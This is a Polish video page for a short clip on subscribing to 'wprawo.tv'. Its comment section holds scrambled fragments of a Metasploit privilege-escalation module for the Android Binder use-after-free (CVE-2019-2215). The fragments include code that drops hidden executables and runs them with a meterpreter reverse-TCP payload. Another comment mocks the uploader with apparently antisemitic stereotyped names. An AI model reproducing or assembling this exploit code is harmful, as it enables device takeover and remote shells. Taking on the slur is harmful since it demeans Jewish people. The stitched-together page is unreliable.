INSTRUKCJA - JAK SUBSKRYBOWAĆ WPRAWO. TV00:02:20

    zwiń opis video pokaż opis video
    Dodał: Jacek_Miedlar

    Komentarze

    • avatar

      Artur_Dyskopata  

      Piotr Rybak odpowiedz

    • avatar

      anonim  

      def exploit
      local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" )
      exploit_data = File.read(local_file, {:mode => 'rb'})

      workingdir = session.fs.dir.getwd
      exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
      upload_and_chmodx(exploit_file, exploit_data)
      payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
      upload_and_chmodx(payload_file, generate_payload_exe)

      print_status("Executing exploit '#{exploit_file}'")
      result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
      print_status("Exploit result:\n#{result}")
      end
      end
      odpowiedz

    • avatar

      anonim  

      'Platform' => [ "android", "linux" ],
      'Arch' => [ ARCH_AARCH64 ],
      'Targets' => [[ 'Auto', {} ]],
      'DefaultOptions' =>
      {
      'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
      'WfsDelay' => 5, odpowiedz

    • avatar

      anonim  

      'Name' => "Android Binder Use-After-Free Exploit",
      'Description' => %q{
      }, odpowiedz

    • avatar

      anonim  

      class MetasploitModule < Msf::Exploit::Local
      Rank = ExcellentRanking

      include Msf::Post::File
      include Msf::Post::Common
      include Msf::Exploit::EXE
      include Msf::Exploit::FileDropper odpowiedz

    • avatar

      anonim  

      Icek Mordka Mendler odpowiedz